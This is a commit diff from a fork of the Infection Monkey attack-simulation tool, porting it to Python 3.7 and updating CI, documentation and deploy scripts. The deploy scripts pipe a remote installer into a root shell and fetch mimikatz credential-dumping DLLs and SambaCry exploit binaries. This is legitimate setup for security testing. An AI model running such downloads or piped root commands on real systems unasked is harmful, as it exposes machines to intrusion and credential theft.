forked from p15670423/monkey
commit
dcbe7b1ee0
48
.travis.yml
48
.travis.yml
|
@ -1,18 +1,48 @@
|
|||
# Infection Monkey travis.yml. See Travis documentation for information about this file structure.
|
||||
|
||||
group: travis_latest
|
||||
|
||||
language: python
|
||||
|
||||
cache: pip
|
||||
|
||||
python:
|
||||
- 2.7
|
||||
- 3.7
|
||||
|
||||
install:
|
||||
#- pip install -r requirements.txt
|
||||
- pip install flake8 # pytest # add another testing frameworks later
|
||||
- pip install -r monkey/monkey_island/requirements.txt # for unit tests
|
||||
- pip install flake8 pytest dlint # for next stages
|
||||
- pip install -r monkey/infection_monkey/requirements_linux.txt # for unit tests
|
||||
|
||||
before_script:
|
||||
# stop the build if there are Python syntax errors or undefined names
|
||||
- flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics
|
||||
# exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide
|
||||
- flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics
|
||||
# Check syntax errors and fail the build if any are found.
|
||||
- flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics
|
||||
|
||||
# Warn about linter issues.
|
||||
# --exit-zero forces Flake8 to use the exit status code 0 even if there are errors, which means this will NOT fail the build.
|
||||
# --count will print the total number of errors.
|
||||
# --statistics Count the number of occurrences of each error/warning code and print a report.
|
||||
# The output is redirected to a file.
|
||||
- flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics > flake8_warnings.txt
|
||||
# Display the linter issues
|
||||
- cat flake8_warnings.txt
|
||||
# Make sure that we haven't increased the amount of warnings.
|
||||
- WARNINGS_AMOUNT_UPPER_LIMIT=190
|
||||
- if [ $(tail -n 1 flake8_warnings.txt) -gt $WARNINGS_AMOUNT_UPPER_LIMIT ]; then echo "Too many warnings! Failing this build. Lower the amount of linter errors in this and try again. " && exit 1; fi
|
||||
|
||||
# Set the server config to `testing`, for the UTs to use mongomaock and pass.
|
||||
- python monkey/monkey_island/cc/set_server_config.py testing
|
||||
|
||||
script:
|
||||
- true # pytest --capture=sys # add other tests here
|
||||
- cd monkey # This is our source dir
|
||||
- python -m pytest # Have to use `python -m pytest` instead of `pytest` to add "{$builddir}/monkey/monkey" to sys.path.
|
||||
|
||||
notifications:
|
||||
slack: # Notify to slack
|
||||
rooms:
|
||||
- infectionmonkey:QaXbsx4g7tHFJW0lhtiBmoAg#ci # room: #ci
|
||||
on_success: change
|
||||
on_failure: change # `always` will be the setting once code changes slow down
|
||||
on_failure: always
|
||||
email:
|
||||
on_success: change
|
||||
on_failure: always
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# Hi there
|
||||
# Hi there 🐵
|
||||
|
||||
Thanks for your interest in making the Monkey -- and therefore, your network -- a better place!
|
||||
|
||||
|
@ -10,8 +10,13 @@ to reproduce. While we'll try to help anyway, focusing us will help us help you
|
|||
If you want to contribute new code or fix bugs, please read the following sections. You can also contact us (the
|
||||
maintainers of this project) at our [Slack channel](https://join.slack.com/t/infectionmonkey/shared_invite/enQtNDU5MjAxMjg1MjU1LTM2ZTg0ZDlmNWNlZjQ5NDI5NTM1NWJlYTRlMGIwY2VmZGMxZDlhMTE2OTYwYmZhZjM1MGZhZjA2ZjI4MzA1NDk).
|
||||
|
||||
## Submitting Issues
|
||||
* **Do** write a detailed description of your bug and use a descriptive title.
|
||||
* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
|
||||
|
||||
## Submitting code
|
||||
You can look at [this issue](https://github.com/guardicore/monkey/issues/430) for an example.
|
||||
|
||||
## Submitting Code
|
||||
|
||||
The following is a *short* list of recommendations. PRs that don't match these criteria won't be closed but it'll be harder to merge the changes into the code.
|
||||
|
||||
|
@ -24,18 +29,23 @@ The following is a *short* list of recommendations. PRs that don't match these c
|
|||
|
||||
Also, please submit PRs to the `develop` branch.
|
||||
|
||||
#### Unit tests
|
||||
#### Unit Tests
|
||||
**Do** add unit tests if you think it fits. We place our unit tests in the same folder as the code, with the same
|
||||
filename, followed by the _test suffix. So for example: `somefile.py` will be tested by `somefile_test.py`.
|
||||
|
||||
Please try to read some of the existing unit testing code, so you can see some examples.
|
||||
|
||||
#### Branch naming scheme
|
||||
#### Branches Naming Scheme
|
||||
**Do** name your branches in accordance with GitFlow. The format is `ISSUE_#/BRANCH_NAME`; For example,
|
||||
`400/zero-trust-mvp` or `232/improvment/hide-linux-on-cred-maps`.
|
||||
|
||||
## Issues
|
||||
* **Do** write a detailed description of your bug and use a descriptive title.
|
||||
* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.
|
||||
#### Continuous Integration
|
||||
We use [TravisCI](https://travis-ci.com/guardicore/monkey) for automatically checking the correctness and quality of submitted
|
||||
pull requests. If your build fails, it might be because of one of the following reasons:
|
||||
* Syntax errors.
|
||||
* Failing Unit Tests.
|
||||
* Too many linter warnings.
|
||||
|
||||
Thank you for reading this before opening an issue or a PR, you've already doing good!
|
||||
In any of these cases, you can look for the cause of the failure in the _job log_ in your TravisCI build.
|
||||
|
||||
#### Thank you for reading this before opening an issue or a PR, you're already doing good!
|
||||
|
|
37
README.md
37
README.md
|
@ -1,8 +1,10 @@
|
|||
Infection Monkey
|
||||
====================
|
||||
# Infection Monkey
|
||||
[![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=develop)](https://travis-ci.com/guardicore/monkey)
|
||||
[![GitHub release (latest by date)](https://img.shields.io/github/v/release/guardicore/monkey)](https://github.com/guardicore/monkey/releases)
|
||||
![GitHub stars](https://img.shields.io/github/stars/guardicore/monkey)
|
||||
![GitHub commit activity](https://img.shields.io/github/commit-activity/m/guardicore/monkey)
|
||||
|
||||
### Data center Security Testing Tool
|
||||
------------------------
|
||||
## Data center Security Testing Tool
|
||||
|
||||
Welcome to the Infection Monkey!
|
||||
|
||||
|
@ -12,15 +14,14 @@ The Infection Monkey is an open source security tool for testing a data center's
|
|||
|
||||
<img src=".github/Security-overview.png" width="800" height="500">
|
||||
|
||||
|
||||
The Infection Monkey is comprised of two parts:
|
||||
* Monkey - A tool which infects other machines and propagates to them
|
||||
* Monkey Island - A dedicated server to control and visualize the Infection Monkey's progress inside the data center
|
||||
|
||||
To read more about the Monkey, visit http://infectionmonkey.com
|
||||
|
||||
Main Features
|
||||
---------------
|
||||
|
||||
## Main Features
|
||||
The Infection Monkey uses the following techniques and exploits to propagate to other machines.
|
||||
|
||||
* Multiple propagation techniques:
|
||||
|
@ -36,22 +37,32 @@ The Infection Monkey uses the following techniques and exploits to propagate to
|
|||
* SambaCry
|
||||
* Elastic Search (CVE-2015-1427)
|
||||
|
||||
Setup
|
||||
-------------------------------
|
||||
## Setup
|
||||
Check out the [Setup](https://github.com/guardicore/monkey/wiki/setup) page in the Wiki or a quick getting [started guide](https://www.guardicore.com/infectionmonkey/wt/).
|
||||
|
||||
The Infection Monkey supports a variety of platforms, documented [in the wiki](https://github.com/guardicore/monkey/wiki/OS-compatibility).
|
||||
|
||||
|
||||
Building the Monkey from source
|
||||
-------------------------------
|
||||
## Building the Monkey from source
|
||||
To deploy development version of monkey you should refer to readme in the [deployment scripts](deployment_scripts) folder.
|
||||
If you only want to build the monkey from source, see [Setup](https://github.com/guardicore/monkey/wiki/Setup#compile-it-yourself)
|
||||
and follow the instructions at the readme files under [infection_monkey](infection_monkey) and [monkey_island](monkey_island).
|
||||
|
||||
|
||||
License
|
||||
=======
|
||||
### Build status
|
||||
| Branch | Status |
|
||||
| ------ | :----: |
|
||||
| Develop | [![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=develop)](https://travis-ci.com/guardicore/monkey) |
|
||||
| Master | [![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=master)](https://travis-ci.com/guardicore/monkey) |
|
||||
|
||||
## Tests
|
||||
### Unit Tests
|
||||
In order to run all of the Unit Tests, run the command `python -m pytest` in the `monkey` directory.
|
||||
|
||||
### Blackbox tests
|
||||
In order to run the Blackbox tests, refer to `envs/monkey_zoo/blackbox/README.md`.
|
||||
|
||||
# License
|
||||
Copyright (c) Guardicore Ltd
|
||||
|
||||
See the [LICENSE](LICENSE) file for license rights and limitations (GPLv3).
|
||||
|
|
|
@ -13,10 +13,11 @@ Don't forget to add python to PATH or do so while installing it via this script.
|
|||
|
||||
## Linux
|
||||
|
||||
Linux deployment script is meant for Ubuntu 16.x machines.
|
||||
You must have root permissions, but don't run the script as root.<br>
|
||||
Launch deploy_linux.sh from scripts directory.<br>
|
||||
First argument should be an empty directory (script can create one, default is ./infection_monkey) and second is the branch you want to clone (develop by default).
|
||||
Choose a directory where you have all the relevant permissions, for e.g. /home/your_username
|
||||
First argument should be an absolute path of an empty directory (script will create one if doesn't exist, default is ./infection_monkey).
|
||||
Second parameter is the branch you want to clone (develop by default).
|
||||
Example usages:<br>
|
||||
./deploy_linux.sh (deploys under ./infection_monkey)<br>
|
||||
./deploy_linux.sh "/home/test/monkey" (deploys under /home/test/monkey)<br>
|
||||
|
|
|
@ -14,6 +14,12 @@ WINDOWS_32_BINARY_NAME="monkey-windows-32.exe"
|
|||
WINDOWS_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-64.exe"
|
||||
WINDOWS_64_BINARY_NAME="monkey-windows-64.exe"
|
||||
|
||||
# Other binaries for monkey
|
||||
TRACEROUTE_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/traceroute64"
|
||||
TRACEROUTE_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/traceroute32"
|
||||
SAMBACRY_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner64.so"
|
||||
SAMBACRY_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner32.so"
|
||||
|
||||
# Mongo url's
|
||||
MONGO_DEBIAN_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-debian81-latest.tgz"
|
||||
MONGO_UBUNTU_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1604-latest.tgz"
|
||||
|
|
|
@ -3,7 +3,7 @@ $MONKEY_FOLDER_NAME = "infection_monkey"
|
|||
# Url of public git repository that contains monkey's source code
|
||||
$MONKEY_GIT_URL = "https://github.com/guardicore/monkey"
|
||||
# Link to the latest python download or install it manually
|
||||
$PYTHON_URL = "https://www.python.org/ftp/python/2.7.13/python-2.7.13.amd64.msi"
|
||||
$PYTHON_URL = "https://www.python.org/ftp/python/3.7.4/python-3.7.4-amd64.exe"
|
||||
|
||||
# Monkey binaries
|
||||
$LINUX_32_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-32"
|
||||
|
@ -22,27 +22,25 @@ $SAMBA_64_BINARY_NAME = "sc_monkey_runner64.so"
|
|||
# Other directories and paths ( most likely you dont need to configure)
|
||||
$MONKEY_ISLAND_DIR = "\monkey\monkey_island"
|
||||
$MONKEY_DIR = "\monkey\infection_monkey"
|
||||
$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\exploit\sambacry_monkey_runner"
|
||||
$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\bin"
|
||||
$PYTHON_DLL = "C:\Windows\System32\python27.dll"
|
||||
$MK32_DLL = "mk32.dll"
|
||||
$MK64_DLL = "mk64.dll"
|
||||
$TEMP_PYTHON_INSTALLER = ".\python.msi"
|
||||
$MK32_DLL = "mk32.zip"
|
||||
$MK64_DLL = "mk64.zip"
|
||||
$TEMP_PYTHON_INSTALLER = ".\python.exe"
|
||||
$TEMP_MONGODB_ZIP = ".\mongodb.zip"
|
||||
$TEMP_OPEN_SSL_ZIP = ".\openssl.zip"
|
||||
$TEMP_CPP_INSTALLER = "cpp.exe"
|
||||
$TEMP_NPM_INSTALLER = "node.msi"
|
||||
$TEMP_PYWIN32_INSTALLER = "pywin32.exe"
|
||||
$TEMP_UPX_ZIP = "upx.zip"
|
||||
$TEMP_VC_FOR_PYTHON27_INSTALLER = "vcforpython.msi"
|
||||
$UPX_FOLDER = "upx394w"
|
||||
|
||||
# Other url's
|
||||
$VC_FOR_PYTHON27_URL = "https://download.microsoft.com/download/7/9/6/796EF2E4-801B-4FC4-AB28-B59FBF6D907B/VCForPython27.msi"
|
||||
$MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip"
|
||||
$OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip"
|
||||
$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572"
|
||||
$NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi"
|
||||
$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b224/pywin32-224.win-amd64-py2.7.exe"
|
||||
$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b225/pywin32-225.win-amd64-py3.7.exe"
|
||||
$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.zip"
|
||||
$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.zip"
|
||||
$UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip"
|
||||
$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.dll"
|
||||
$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.dll"
|
||||
|
|
|
@ -11,9 +11,9 @@ fi
|
|||
ISLAND_PATH="$monkey_home/monkey/monkey_island"
|
||||
MONKEY_COMMON_PATH="$monkey_home/monkey/common/"
|
||||
MONGO_PATH="$ISLAND_PATH/bin/mongodb"
|
||||
MONGO_BIN_PATH="$MONGO_PATH/bin"
|
||||
ISLAND_DB_PATH="$ISLAND_PATH/db"
|
||||
ISLAND_BINARIES_PATH="$ISLAND_PATH/cc/binaries"
|
||||
INFECTION_MONKEY_DIR="$monkey_home/monkey/infection_monkey"
|
||||
MONKEY_BIN_DIR="$INFECTION_MONKEY_DIR/bin"
|
||||
|
||||
handle_error () {
|
||||
echo "Fix the errors above and rerun the script"
|
||||
|
@ -52,25 +52,47 @@ fi
|
|||
|
||||
# Create folders
|
||||
log_message "Creating island dirs under $ISLAND_PATH"
|
||||
mkdir -p ${MONGO_BIN_PATH}
|
||||
mkdir -p ${ISLAND_DB_PATH}
|
||||
mkdir -p ${MONGO_PATH}
|
||||
mkdir -p ${ISLAND_BINARIES_PATH} || handle_error
|
||||
|
||||
python_version=`python --version 2>&1`
|
||||
if [[ ${python_version} == *"command not found"* ]] || [[ ${python_version} != *"Python 2.7"* ]]; then
|
||||
echo "Python 2.7 is not found or is not a default interpreter for 'python' command..."
|
||||
exit 1
|
||||
# Detecting command that calls python 3.7
|
||||
python_cmd=""
|
||||
if [[ `python --version 2>&1` == *"Python 3.7"* ]]; then
|
||||
python_cmd="python"
|
||||
fi
|
||||
if [[ `python37 --version 2>&1` == *"Python 3.7"* ]]; then
|
||||
python_cmd="python37"
|
||||
fi
|
||||
if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then
|
||||
python_cmd="python3.7"
|
||||
fi
|
||||
|
||||
if [[ ${python_cmd} == "" ]]; then
|
||||
log_message "Python 3.7 command not found. Installing python 3.7."
|
||||
sudo add-apt-repository ppa:deadsnakes/ppa
|
||||
sudo apt install python3.7
|
||||
log_message "Python 3.7 is now available with command 'python3.7'."
|
||||
python_cmd="python3.7"
|
||||
fi
|
||||
|
||||
log_message "Updating package list"
|
||||
sudo apt-get update
|
||||
|
||||
log_message "Installing pip"
|
||||
sudo apt-get install python-pip
|
||||
sudo apt install python3-pip
|
||||
${python_cmd} -m pip install pip
|
||||
|
||||
log_message "Install python3.7-dev"
|
||||
sudo apt-get install python3.7-dev
|
||||
|
||||
log_message "Installing island requirements"
|
||||
requirements="$ISLAND_PATH/requirements.txt"
|
||||
python -m pip install --user -r ${requirements} || handle_error
|
||||
${python_cmd} -m pip install --user --upgrade -r ${requirements} || handle_error
|
||||
|
||||
log_message "Installing monkey requirements"
|
||||
sudo apt-get install libffi-dev upx libssl-dev libc++1
|
||||
cd ${monkey_home}/monkey/infection_monkey || handle_error
|
||||
${python_cmd} -m pip install -r requirements_linux.txt --user --upgrade || handle_error
|
||||
|
||||
# Download binaries
|
||||
log_message "Downloading binaries"
|
||||
|
@ -89,49 +111,42 @@ linux_dist=`lsb_release -a 2> /dev/null`
|
|||
|
||||
# If a user haven't installed mongo manually check if we can install it with our script
|
||||
log_message "Installing MongoDB"
|
||||
${ISLAND_PATH}/linux/install_mongo.sh ${MONGO_BIN_PATH} || handle_error
|
||||
${ISLAND_PATH}/linux/install_mongo.sh ${MONGO_PATH} || handle_error
|
||||
|
||||
log_message "Installing openssl"
|
||||
sudo apt-get install openssl
|
||||
|
||||
# Generate SSL certificate
|
||||
log_message "Generating certificate"
|
||||
cd ${ISLAND_PATH} || handle_error
|
||||
openssl genrsa -out cc/server.key 1024 || handle_error
|
||||
openssl req -new -key cc/server.key -out cc/server.csr \
|
||||
-subj "/C=GB/ST=London/L=London/O=Global Security/OU=Monkey Department/CN=monkey.com" || handle_error
|
||||
openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/server.crt || handle_error
|
||||
|
||||
|
||||
sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error
|
||||
${ISLAND_PATH}/linux/create_certificate.sh || handle_error
|
||||
|
||||
# Install npm
|
||||
log_message "Installing npm"
|
||||
sudo apt-get install npm
|
||||
cd ${ISLAND_PATH}
|
||||
openssl genrsa -out cc/server.key 2048
|
||||
openssl req -new -key cc/server.key -out cc/server.csr -subj "/C=GB/ST=London/L=London/O=Global Security/OU=Monkey Department/CN=monkey.com"
|
||||
openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/server.crt
|
||||
|
||||
# Update node
|
||||
log_message "Updating node"
|
||||
curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash -
|
||||
log_message "Installing nodejs"
|
||||
cd "$ISLAND_PATH/cc/ui" || handle_error
|
||||
curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash -
|
||||
sudo apt-get install -y nodejs
|
||||
npm install sass-loader node-sass webpack --save-dev
|
||||
npm update
|
||||
|
||||
log_message "Generating front end"
|
||||
cd "$ISLAND_PATH/cc/ui" || handle_error
|
||||
npm update
|
||||
npm run dist
|
||||
|
||||
# Monkey setup
|
||||
log_message "Installing monkey requirements"
|
||||
sudo apt-get install python-pip python-dev libffi-dev upx libssl-dev libc++1
|
||||
cd ${monkey_home}/monkey/infection_monkey || handle_error
|
||||
python -m pip install --user -r requirements_linux.txt || handle_error
|
||||
# Making dir for binaries
|
||||
mkdir ${MONKEY_BIN_DIR}
|
||||
|
||||
# Download sambacry binaries
|
||||
log_message "Downloading sambacry binaries"
|
||||
wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_64_BINARY_URL}
|
||||
wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_32_BINARY_URL}
|
||||
|
||||
# Download traceroute binaries
|
||||
log_message "Downloading traceroute binaries"
|
||||
wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_64_BINARY_URL}
|
||||
wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_32_BINARY_URL}
|
||||
|
||||
# Build samba
|
||||
log_message "Building samba binaries"
|
||||
sudo apt-get install gcc-multilib
|
||||
cd ${monkey_home}/monkey/infection_monkey/exploit/sambacry_monkey_runner
|
||||
sudo chmod +x ./build.sh || handle_error
|
||||
./build.sh
|
||||
|
||||
sudo chmod +x ${monkey_home}/monkey/infection_monkey/build_linux.sh
|
||||
|
||||
|
|
|
@ -44,39 +44,28 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
|
|||
try
|
||||
{
|
||||
$version = cmd.exe /c '"python" --version 2>&1'
|
||||
if ( $version -like 'Python 2.7.*' ) {
|
||||
"Python 2.7.* was found, installing dependancies"
|
||||
if ( $version -like 'Python 3.*' ) {
|
||||
"Python 3.* was found, installing dependencies"
|
||||
} else {
|
||||
throw System.Management.Automation.CommandNotFoundException
|
||||
}
|
||||
}
|
||||
catch [System.Management.Automation.CommandNotFoundException]
|
||||
{
|
||||
"Downloading python 2.7 ..."
|
||||
"Downloading python 3 ..."
|
||||
"Select 'add to PATH' when installing"
|
||||
$webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER)
|
||||
Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop
|
||||
$env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine")
|
||||
$env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")
|
||||
Remove-Item $TEMP_PYTHON_INSTALLER
|
||||
# Check if installed correctly
|
||||
$version = cmd.exe /c '"python" --version 2>&1'
|
||||
if ( $version -like '* is not recognized*' ) {
|
||||
"Python is not found in PATH. Add it manually or reinstall python."
|
||||
"Python is not found in PATH. Add it to PATH and relaunch the script."
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
# Set python home dir
|
||||
$PYTHON_PATH = Split-Path -Path (Get-Command python | Select-Object -ExpandProperty Source)
|
||||
|
||||
# Get vcforpython27 before installing requirements
|
||||
"Downloading Visual C++ Compiler for Python 2.7 ..."
|
||||
$webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER)
|
||||
Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop
|
||||
$env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine")
|
||||
Remove-Item $TEMP_VC_FOR_PYTHON27_INSTALLER
|
||||
|
||||
# Install requirements for island
|
||||
$islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop
|
||||
"Upgrading pip..."
|
||||
$output = cmd.exe /c 'python -m pip install --user --upgrade pip 2>&1'
|
||||
$output
|
||||
|
@ -84,11 +73,22 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName,
|
|||
"Make sure pip module is installed and re-run this script."
|
||||
return
|
||||
}
|
||||
|
||||
"Installing python packages for island"
|
||||
$islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop
|
||||
& python -m pip install --user -r $islandRequirements
|
||||
# Install requirements for monkey
|
||||
"Installing python packages for monkey"
|
||||
$monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt"
|
||||
& python -m pip install --user -r $monkeyRequirements
|
||||
|
||||
$user_python_dir = cmd.exe /c 'py -m site --user-site'
|
||||
$user_python_dir = Join-Path (Split-Path $user_python_dir) -ChildPath "\Scripts"
|
||||
if(!($ENV:PATH | Select-String -SimpleMatch $user_python_dir)){
|
||||
"Adding python scripts path to user's env"
|
||||
$env:Path += ";"+$user_python_dir
|
||||
[Environment]::SetEnvironmentVariable("Path",$env:Path,"User")
|
||||
}
|
||||
|
||||
# Download mongodb
|
||||
if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "mongodb") )){
|
||||
"Downloading mongodb ..."
|
||||
|
|
|
@ -1,4 +1,5 @@
|
|||
import requests
|
||||
import functools
|
||||
|
||||
# SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'
|
||||
import logging
|
||||
|
@ -8,6 +9,7 @@ NO_AUTH_CREDS = '55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d206
|
|||
LOGGER = logging.getLogger(__name__)
|
||||
|
||||
|
||||
# noinspection PyArgumentList
|
||||
class MonkeyIslandRequests(object):
|
||||
def __init__(self, server_address):
|
||||
self.addr = "https://{IP}/".format(IP=server_address)
|
||||
|
@ -21,29 +23,43 @@ class MonkeyIslandRequests(object):
|
|||
"Unable to connect to island, aborting! Error information: {}. Server: {}".format(err, self.addr))
|
||||
assert False
|
||||
|
||||
class _Decorators:
|
||||
@classmethod
|
||||
def refresh_jwt_token(cls, request_function):
|
||||
@functools.wraps(request_function)
|
||||
def request_function_wrapper(self, *args,**kwargs):
|
||||
self.token = self.try_get_jwt_from_server()
|
||||
# noinspection PyArgumentList
|
||||
return request_function(self, *args, **kwargs)
|
||||
return request_function_wrapper
|
||||
|
||||
def get_jwt_from_server(self):
|
||||
resp = requests.post(self.addr + "api/auth",
|
||||
json={"username": NO_AUTH_CREDS, "password": NO_AUTH_CREDS},
|
||||
verify=False)
|
||||
return resp.json()["access_token"]
|
||||
|
||||
@_Decorators.refresh_jwt_token
|
||||
def get(self, url, data=None):
|
||||
return requests.get(self.addr + url,
|
||||
headers=self.get_jwt_header(),
|
||||
params=data,
|
||||
verify=False)
|
||||
|
||||
@_Decorators.refresh_jwt_token
|
||||
def post(self, url, data):
|
||||
return requests.post(self.addr + url,
|
||||
data=data,
|
||||
headers=self.get_jwt_header(),
|
||||
verify=False)
|
||||
|
||||
@_Decorators.refresh_jwt_token
|
||||
def post_json(self, url, dict_data):
|
||||
return requests.post(self.addr + url,
|
||||
json=dict_data,
|
||||
headers=self.get_jwt_header(),
|
||||
verify=False)
|
||||
|
||||
@_Decorators.refresh_jwt_token
|
||||
def get_jwt_header(self):
|
||||
return {"Authorization": "JWT " + self.token}
|
||||
|
|
|
@ -13,7 +13,7 @@ from envs.monkey_zoo.blackbox.log_handlers.test_logs_handler import TestLogsHand
|
|||
|
||||
DEFAULT_TIMEOUT_SECONDS = 5*60
|
||||
MACHINE_BOOTUP_WAIT_SECONDS = 30
|
||||
GCP_TEST_MACHINE_LIST = ['sshkeys-11', 'sshkeys-12', 'elastic-4', 'elastic-5', 'haddop-2', 'hadoop-3', 'mssql-16',
|
||||
GCP_TEST_MACHINE_LIST = ['sshkeys-11', 'sshkeys-12', 'elastic-4', 'elastic-5', 'hadoop-2', 'hadoop-3', 'mssql-16',
|
||||
'mimikatz-14', 'mimikatz-15', 'struts2-23', 'struts2-24', 'tunneling-9', 'tunneling-10',
|
||||
'tunneling-11', 'weblogic-18', 'weblogic-19', 'shellshock-8']
|
||||
LOG_DIR_PATH = "./logs"
|
||||
|
|
|
@ -23,7 +23,6 @@ class BasicTest(object):
|
|||
self.log_handler = log_handler
|
||||
|
||||
def run(self):
|
||||
LOGGER.info("Uploading configuration:\n{}".format(json.dumps(self.config_parser.config_json, indent=2)))
|
||||
self.island_client.import_config(self.config_parser.config_raw)
|
||||
self.print_test_starting_info()
|
||||
try:
|
||||
|
|
|
@ -1,16 +1,15 @@
|
|||
import json
|
||||
import re
|
||||
import urllib2
|
||||
import urllib.request
|
||||
import urllib.error
|
||||
import logging
|
||||
|
||||
|
||||
__author__ = 'itay.mizeretz'
|
||||
|
||||
AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS = "169.254.169.254"
|
||||
AWS_LATEST_METADATA_URI_PREFIX = 'http://{0}/latest/'.format(AWS_INSTANCE_METADATA_LOCAL_IP_ADDRESS)
|
||||
ACCOUNT_ID_KEY = "accountId"
|
||||
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
|
@ -25,19 +24,20 @@ class AwsInstance(object):
|
|||
self.account_id = None
|
||||
|
||||
try:
|
||||
self.instance_id = urllib2.urlopen(
|
||||
AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2).read()
|
||||
self.instance_id = urllib.request.urlopen(
|
||||
AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2).read().decode()
|
||||
self.region = self._parse_region(
|
||||
urllib2.urlopen(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read())
|
||||
except (urllib2.URLError, IOError) as e:
|
||||
logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e.message), exc_info=True)
|
||||
urllib.request.urlopen(
|
||||
AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read().decode())
|
||||
except (urllib.error.URLError, IOError) as e:
|
||||
logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e))
|
||||
|
||||
try:
|
||||
self.account_id = self._extract_account_id(
|
||||
urllib2.urlopen(
|
||||
AWS_LATEST_METADATA_URI_PREFIX + 'dynamic/instance-identity/document', timeout=2).read())
|
||||
except (urllib2.URLError, IOError) as e:
|
||||
logger.debug("Failed init of AwsInstance while getting dynamic instance data: {}".format(e.message))
|
||||
urllib.request.urlopen(
|
||||
AWS_LATEST_METADATA_URI_PREFIX + 'dynamic/instance-identity/document', timeout=2).read().decode())
|
||||
except (urllib.error.URLError, IOError) as e:
|
||||
logger.debug("Failed init of AwsInstance while getting dynamic instance data: {}".format(e))
|
||||
|
||||
@staticmethod
|
||||
def _parse_region(region_url_response):
|
||||
|
|
|
@ -14,7 +14,6 @@ COMPUTER_NAME_KEY = 'ComputerName'
|
|||
PLATFORM_TYPE_KEY = 'PlatformType'
|
||||
IP_ADDRESS_KEY = 'IPAddress'
|
||||
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
|
@ -84,5 +83,5 @@ class AwsService(object):
|
|||
filtered_instances_data = filter_instance_data_from_aws_response(response)
|
||||
return filtered_instances_data
|
||||
except botocore.exceptions.ClientError as e:
|
||||
logger.warning("AWS client error while trying to get instances: " + e.message)
|
||||
logger.warning("AWS client error while trying to get instances: " + e)
|
||||
raise e
|
||||
|
|
|
@ -1,9 +1,8 @@
|
|||
from unittest import TestCase
|
||||
